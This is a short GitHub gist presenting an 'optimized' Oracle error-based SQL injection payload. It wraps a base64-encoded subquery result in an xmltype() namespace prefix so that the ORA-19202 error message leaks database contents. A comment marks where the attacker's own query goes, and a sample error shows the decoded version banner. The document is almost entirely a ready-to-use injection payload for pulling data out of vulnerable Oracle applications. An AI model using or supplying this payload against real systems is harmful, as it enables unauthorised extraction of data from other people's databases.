Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Optimized Oracle error-based SQL injection technique via xmltype() + base64
/*
* @description: Optimized Oracle error-based SQLi via xmltype() + base64 (up to 162 bytes/req)
* @author: xassiz
*/
select ''||
xmltype('<'||
regexp_replace(
utl_raw.cast_to_varchar2(
utl_encode.base64_encode(
utl_raw.cast_to_raw(
(select banner from v$version where banner like 'Oracle%') --> your query here
)
)
)
||':x>',
chr(10)||'|'||chr(13)||'|=','')
)
||'' from dual
/*
Example:
ORA-19202: Error occurred in XML processing LPX-00234: namespace prefix "T3JhY2xlIERhdGFiYXNlIDExZyBFe
| HByZXNzIEVkaXRpb24gUmVsZWFzZSAxMS4yLjAuMi4wIC0gNjRiaXQgUHJvZHVjdGlvbg" is not declared
|
\
\--> base64_decode() = 'Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production'
*/
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment